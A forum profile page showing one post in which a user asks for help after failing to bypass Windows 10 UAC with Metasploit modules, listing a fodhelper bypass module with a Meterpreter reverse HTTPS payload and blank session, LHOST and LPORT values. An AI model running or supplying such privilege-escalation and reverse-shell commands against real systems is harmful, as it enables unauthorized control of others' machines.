Jump to content

p.c00d3r

Members
  • Posts

    2
  • Joined

  • Last visited

Posts posted by p.c00d3r

  1. WINDOWS 10 x64. I tried bypassuac_injection/bypassuac_fodhelper/bypassuac_injection_xSS. May be I tried the wrong commands.

    use windows/local/bypassuac_fodhelper
    set SESSION
    set PAYLOAD windows/meterpreter/reverse_https
    set LHOST
    set LPORT
    run

×
×
  • Create New...